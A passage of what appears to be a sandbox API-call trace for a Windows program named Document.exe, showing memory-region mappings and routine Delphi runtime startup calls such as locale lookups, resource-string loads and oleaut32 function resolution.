"c:\\windows\\system32\\locale.nls") Region: id = 1940 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1941 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1942 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1943 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1944 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1945 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1946 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1947 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1948 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1949 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1950 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1951 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1952 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1953 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1954 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1955 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1956 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1957 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1958 start_va = 0x77780000 end_va = 0x777fafff entry_point = 0x77780000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1959 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1960 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1961 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1962 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1963 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1964 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1965 start_va = 0x6b0000 end_va = 0x837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1966 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1967 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1968 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1969 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1970 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1971 start_va = 0x840000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1972 start_va = 0x9d0000 end_va = 0x1dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 1973 start_va = 0x1dd0000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1974 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1975 start_va = 0x1ed0000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1976 start_va = 0x4c0000 end_va = 0x59efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1977 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1978 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1979 start_va = 0x310000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1980 start_va = 0x20f0000 end_va = 0x2a1ffff entry_point = 0x20f0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1981 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1982 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1983 start_va = 0x2a20000 end_va = 0x2e12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Thread: id = 88 os_tid = 0xb84 [0213.770] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0213.770] GetKeyboardType (nTypeFlag=0) returned 4 [0213.770] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0213.770] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0213.770] GetVersion () returned 0x1db10106 [0213.770] GetVersion () returned 0x1db10106 [0213.770] GetCurrentThreadId () returned 0xb84 [0213.771] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0213.771] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0213.771] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0213.771] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0213.771] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0213.771] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0213.771] GetThreadLocale () returned 0x409 [0213.772] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0213.772] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 55 [0213.772] lstrcpynA (in: lpString1=0x18f907, lpString2="ENU", iMaxLength=209 | out: lpString1="ENU") returned="ENU" [0213.773] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0213.773] lstrcpynA (in: lpString1=0x18f907, lpString2="EN", iMaxLength=209 | out: lpString1="EN") returned="EN" [0213.773] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0213.773] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0213.773] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5c6350 [0213.773] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1dd0000 [0213.774] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5c7350 [0213.774] VirtualAlloc (lpAddress=0x1dd0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1dd0000 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0213.774] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0213.775] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0213.775] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0213.775] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0213.775] GetProcAddress (hModule=0x76220000, lpProcName="GetDiskFreeSpaceExA") returned 0x762b434f [0213.775] GetThreadLocale () returned 0x409 [0213.775] GetThreadLocale () returned 0x409 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0213.775] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0213.776] GetThreadLocale () returned 0x409 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0213.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0213.777] GetThreadLocale () returned 0x409 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0213.777] GetThreadLocale () returned 0x409 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0213.777] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0213.777] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0213.777] GetProcAddress (hModule=0x76720000, lpProcName="VariantChangeTypeEx") returned 0x76724c28 [0213.777] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0213.777] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0213.777] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarI4FromStr") returned 0x76736fab [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromStr") returned 0x767401a0 [0213.778] GetProcAddress (hModule=0x76720000, lpProcName="VarR8FromStr") returned 0x7673699e [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromStr") returned 0x76746ba7 [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarCyFromStr") returned 0x76766c12 [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarBoolFromStr") returned 0x7673dbd1 [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromCy") returned 0x76747fdc [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromDate") returned 0x76737a2a [0213.779] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromBool") returned 0x76740355 [0213.779] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0213.779] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0213.779] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0213.780] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77820000 [0213.780] GetDC (hWnd=0x0) returned 0x6401089b [0213.780] GetDeviceCaps (hdc=0x6401089b, index=90) returned 96 [0213.780] ReleaseDC (hWnd=0x0, hDC=0x6401089b) returned 1 [0213.780] GetDC (hWnd=0x0) returned 0x6401089b [0213.780] GetDeviceCaps (hdc=0x6401089b, index=104) returned 0 [0213.780] ReleaseDC (hWnd=0x0, hDC=0x6401089b) returned 1 